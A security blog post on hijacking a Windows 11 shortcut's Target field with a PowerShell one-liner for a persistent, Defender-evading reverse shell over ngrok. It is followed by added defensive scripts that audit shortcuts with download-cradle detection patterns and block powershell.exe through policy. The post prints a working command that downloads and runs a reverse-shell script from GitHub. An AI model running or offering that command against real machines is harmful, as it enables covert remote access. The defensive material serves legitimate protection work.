Security Tips Against Attacks on Windows 11 and Microsoft Edge via WAN

Osman Kandemir
3 min read · Oct 24, 2022

NOTE: This blog post was written for education and to raise awareness about information security. The technique shown here must only be used with authorization, in legal engagements (white-box or grey-box tests). Our main FOCUS is the SECURITY TIPS section at the end. Be sure to read that part.

Test Environment Versions

  • PowerShell version (Get-Host): 5.1.22621.169
  • Windows version ([Environment]::OSVersion): Windows 11 Pro 10.0.22621
  • Microsoft Defender (Get-MpComputerStatus): AntivirusSignatureVersion 1.377.509.0

GIF 1: Environment for Reverse Shell

The fundamental technique is to obtain a reverse shell by placing a PowerShell one-liner in the Target field of an application shortcut (GIF 1).

ngrok was used for the WAN-to-LAN attack. I have described the installation steps in other sections.

Three scripts were used. The first, Powercat, established the reverse shell. The second bypassed Microsoft Defender. The third merged the first two and added some social engineering touches, such as setting the terminal window size, closing the terminal window, and opening Microsoft Edge so the victim sees the application they expected.

My PowerShell script: https://github.com/OsmanKandemir/PowerSTest/blob/main/run.ps1

The ngrok TCP URL and port number must be changed in the PowerShell script before use.

Suspicious PowerShell Script For Application Target Field

powershell.exe -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/OsmanKandemir/PowerSTest/main/run.ps1');run"

Test

GIF 2: Result

The simulation was completed over TCP, with ngrok forwarding the port from WAN to LAN. From the victim's point of view everything looks normal, yet Microsoft Defender has been bypassed (GIF 2). Kali Linux runs in VMware, and Kali and the Windows 11 machine are on the same local network, but the connection is routed over the WAN through ngrok.

An attacker can obtain a persistent reverse shell with this method.

The one small difference from other methods is that a broken connection is re-established automatically, so the shell survives network interruptions.

Social Engineering

An attacker with a few seconds at an unlocked desktop could paste a malicious one-liner into the Target field of an application shortcut (Properties > Shortcut > Target). The next time the victim opens that application, the payload runs, and the script then opens Microsoft Edge so the victim sees the program they expected.

The one-liner shown above ("Suspicious PowerShell Script For Application Target Field") downloads run.ps1 from GitHub, executes it in memory with IEX (Invoke-Expression), and then invokes run, the entry point the downloaded script defines.
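Since the whole attack rests on a shortcut whose Target field no longer points at the real application, the practical check is to audit the shortcuts a user actually double-clicks. The script below is an added example and is not part of the original post or the author's PowerSTest repository. It reads each .lnk with the WScript.Shell COM object and flags shortcuts whose Target runs a script host and whose command line carries a download cradle or a hiding flag; the directory list and the two regular expressions are assumptions for illustration and should be extended for your environment.

```powershell
# Added example (not from the original post): find shortcuts whose Target field
# has been replaced with a script-host one-liner like the one shown above.
# The directories and patterns below are assumptions; extend them as needed.

$shell = New-Object -ComObject WScript.Shell

# Places where the shortcuts that users click actually live.
$shortcutDirs = @(
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('CommonDesktopDirectory'),
    [Environment]::GetFolderPath('StartMenu'),
    [Environment]::GetFolderPath('CommonStartMenu'),
    (Join-Path $env:APPDATA 'Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar')
)

# Script hosts an attacker would put in a Target field ...
$hostPattern   = '(?i)\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32)(\.exe)?\b'
# ... and strings that appear in download cradles or hidden/obfuscated one-liners.
$cradlePattern = '(?i)(IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|\birm\b|FromBase64String|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|https?://)'

function Get-SuspiciousShortcuts {
    param([string[]]$Directories = $shortcutDirs)

    foreach ($dir in $Directories) {
        if (-not (Test-Path $dir)) { continue }

        Get-ChildItem -Path $dir -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            # Windows splits "powershell.exe -c ..." typed into the Target field
            # into TargetPath (the exe) and Arguments (everything after it).
            $lnk     = $shell.CreateShortcut($_.FullName)
            $cmdline = "$($lnk.TargetPath) $($lnk.Arguments)"

            # Either signal alone is noisy (admins do pin PowerShell); both
            # together is the shape of the one-liner in this post.
            $hostHit   = $cmdline -match $hostPattern
            $cradleHit = $cmdline -match $cradlePattern

            if ($hostHit -and $cradleHit) {
                [pscustomobject]@{
                    Shortcut    = $_.FullName
                    Target      = $lnk.TargetPath
                    Arguments   = $lnk.Arguments
                    WindowStyle = $lnk.WindowStyle   # 7 = minimized, a common hiding trick
                    Modified    = $_.LastWriteTime   # a recent change on an old shortcut is itself a clue
                }
            }
        }
    }
}

Get-SuspiciousShortcuts | Format-List
```

Run it as the user whose desktop you are checking; it needs no elevation because it only reads .lnk files. A hit on a shortcut named after Edge, Chrome or Office whose Target is powershell.exe is exactly the tampering described above, and the Modified timestamp tells you when it happened.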

Security Tips

  • If you step away from your computer, lock the screen (Win+L). Tampering with a shortcut's Target field only takes a few seconds at an unlocked desktop.
  • If a CMD or PowerShell window appears when you open an application, kill it from Task Manager, and check the command line of that process (Details tab) and the Target field of the shortcut you just opened (Properties > Shortcut).
  • You might block "powershell.exe" in the Local Group Policy Editor (Figure 1). Block powershell_ise.exe and pwsh.exe as well, since they are separate binaries. If the policy used is "Don't run specified Windows applications", remember that it is enforced by Windows Explorer only: it stops a shortcut launch like the one in this post, but not a powershell.exe started from cmd.exe or another process, and a copy of the binary under a different name is not matched. AppLocker or WDAC rules give stronger coverage.
Figure 1: Local Group Policy Editor
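The same restriction can be applied from PowerShell for the current user. The script below is an added example and is not from the original post; it assumes the policy shown in Figure 1 is "Don't run specified Windows applications" (User Configuration > Administrative Templates > System), writes the registry values that policy uses, and can read the list back or remove it again. The list of blocked binaries is an assumption for illustration.

```powershell
# Added example (not from the original post): apply "Don't run specified Windows
# applications" for the current user via the registry values gpedit.msc writes.
# Caveat: this list is enforced by Windows Explorer only. It blocks a shortcut whose
# Target launches powershell.exe (the vector in this post), but not a powershell.exe
# started from cmd.exe, Task Scheduler or any other process.

$policyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$listKey   = Join-Path $policyKey 'DisallowRun'

# Binaries to block (assumed list). powershell.exe alone is not enough: the ISE and
# PowerShell 7 have their own file names. The 32-bit copy under SysWOW64 shares the
# name powershell.exe, so it is covered by the first entry.
$blocked = @('powershell.exe', 'powershell_ise.exe', 'pwsh.exe')

function Set-DisallowRunList {
    param([string[]]$Names)

    foreach ($k in $policyKey, $listKey) {
        if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
    }

    # DisallowRun = 1 switches the list on; the entries live under the DisallowRun
    # subkey as string values named "1", "2", ..., exactly as gpedit.msc writes them.
    New-ItemProperty -Path $policyKey -Name 'DisallowRun' -PropertyType DWord -Value 1 -Force | Out-Null

    # Replace any existing entries so the list matches $Names exactly.
    foreach ($name in (Get-Item $listKey).Property) {
        Remove-ItemProperty -Path $listKey -Name $name
    }
    $i = 1
    foreach ($exe in $Names) {
        New-ItemProperty -Path $listKey -Name ([string]$i) -PropertyType String -Value $exe -Force | Out-Null
        $i++
    }
}

function Get-DisallowRunList {
    if (-not (Test-Path $listKey)) { return @() }
    $item = Get-Item $listKey
    $item.Property | Sort-Object { [int]$_ } | ForEach-Object { $item.GetValue($_) }
}

function Clear-DisallowRunList {
    # Undo: remove the list and the switch so Explorer launches everything again.
    if (Test-Path $listKey)   { Remove-Item -Path $listKey -Recurse -Force }
    if (Test-Path $policyKey) { Remove-ItemProperty -Path $policyKey -Name 'DisallowRun' -ErrorAction SilentlyContinue }
}

Set-DisallowRunList -Names $blocked
"Enabled: $((Get-ItemProperty -Path $policyKey).DisallowRun)"
"Blocked: $((Get-DisallowRunList) -join ', ')"
# Explorer reads the list at logon: sign out and back in (or restart explorer.exe)
# before testing. After that, double-clicking a shortcut whose Target is
# powershell.exe shows "This operation has been cancelled due to restrictions".
```

Because the script itself runs in powershell.exe, launch it from a console that is already open; once the policy is active, Explorer and the Run dialog will refuse to start PowerShell, which is the point. Keep Clear-DisallowRunList at hand for administrators who still need the shell from a shortcut.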

Stay Safe.

Resources

1. https://github.com/OsmanKandemir/PowerSTest/blob/main/run.ps1

2. https://github.com/besimorhino/powercat

3. https://github.com/aloksaurabh/OffenPowerSh

4. https://stackoverflow.com/a/56196508

5. https://www.youtube.com/watch?v=ZIzViKPEFIw
